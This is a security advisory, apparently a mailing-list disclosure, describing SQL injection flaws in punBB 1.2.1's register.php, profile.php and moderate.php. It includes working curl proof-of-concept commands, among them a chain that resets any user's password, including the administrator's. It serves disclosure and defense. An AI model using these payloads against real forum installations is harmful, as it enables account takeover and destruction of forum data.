Multiple vulns in punBB
...
- Johannes Gumbel
=================================================
SQL Injections in punbb-1.2.1 register.php
=================================================
Description
-----------
A remote attacker can cause register.php to execute
arbitrary SQL statements by supplying malicous
values to the language or email parameter.
The email paramter is guarded by the function
is_valid_email but this function doesn't do any
real filtering and will pass any SQL statement
that is formatted correctly.
This also affects systems using the magic_quotes_gpc
option in php.ini.
Proof of concept
----------------
This example only demonstrates the vulnerability in
the language paramter.
curl --form form_sent=1 --form req_username=sha --form req_password1=passwd
--form req_paspasswd --form req_email1=sha@xxxxxxxxx --form language="English',
'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer
Will create a user with the language English, style
Oxygen and ip 0.0.0.0.
=======================================================
Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================
Description
-----------
A remote attacker without an account can set the password
of any user on the system to NULL, effectivley shuting
them out of the system.
A user on the system can also inject an arbitrary
SQL statement using the change email feature. This has
occured because of a fault in the is_valid_email function
which returns true for strings that are not even close to
being a valid email.
This also affects systems using the magic_quotes_gpc
option in php.ini.
By combining these two an attacker with an account on
the forum can change the password for any user to anything
he/she wants to, gaining full access to the administrator
account.
Proof of concept
----------------
Examples of the damage the DoS attack and arbitrary
SQL statement attacks can do on their own has been
omitted. This is a demonstration of their power when
combined.
Assumptions for this particular example:
- There is a user on the system with id 3 that has
username/password set to 'sha'/'passwd'.
- The cookie is valid for sha on system
- The system supports sha1.
- The new password for the id 2 account is supposed to
be 'newpass'.
curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 --form
req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@xxxxxxxxx"
http://target/profile.php?action=change_email\&id=3
This will push the sha1 encrypted password 'newpass'
into every users activate_string field. All that needs
to be done is pushing this field to the password field
of any user we want using the other bug.
curl http://target/profile.php?action=change_pass\&id=2\&key=
Now the account with user id 2 has the password 'newpass' set.
==============================================
SQL Injections in punbb-1.2.1 moderate.php
==============================================
Description
-----------
Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.
This also affects systems using the magic_quotes_gpc
option in php.ini.
Proof of concept
----------------
These examples will not do anything malicious or
even cause the system to report an error. Instead
they are crafted such that by simply adding a ;
or ' just before the comment "-- this won't show"
will cause the SQL query to crash demonstrating
the injection is possible.
Assumptions:
- punbb_cookie contains identification of a
moderator for forum with id 1.
Attacks delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show"
--form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie>
target/moderate.php?fid=1\&tid=1
Attacks move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show"
--form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie
punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show"
--form delete_topics=1 --form delete_topics_comply=1 --cookie
punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks open/close:
curl --referer http://target/moderate.php --form "topics[0) -- this won't
show]"= --form open=1 --cookie "punbb_cookie=<valid cookie>
target/moderate.php?fid=1